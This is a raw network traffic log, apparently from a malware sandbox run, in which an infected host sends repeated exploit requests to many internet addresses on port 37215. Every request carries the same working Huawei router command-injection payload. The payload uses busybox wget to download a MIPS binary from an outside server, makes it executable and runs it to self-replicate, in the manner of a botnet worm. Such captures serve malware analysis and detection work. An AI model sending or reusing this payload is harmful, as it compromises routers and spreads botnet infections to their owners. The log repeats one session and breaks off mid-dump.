                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          440192.168.2.1539372197.173.21.5537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.575299978 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          441192.168.2.1533328197.53.212.4137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.575323105 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          442192.168.2.1560852157.15.151.14537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.575340033 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          443192.168.2.1558868125.56.11.10537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.575355053 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          May 28, 2024 09:55:48.809897900 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          444192.168.2.1557362197.108.20.18137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.575378895 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          445192.168.2.1532830157.174.119.7437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.575418949 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          446192.168.2.1540308222.1.35.5837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.575437069 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          447192.168.2.1536800197.107.153.937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.575469017 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          448192.168.2.153488841.201.193.11637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:48.575500011 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 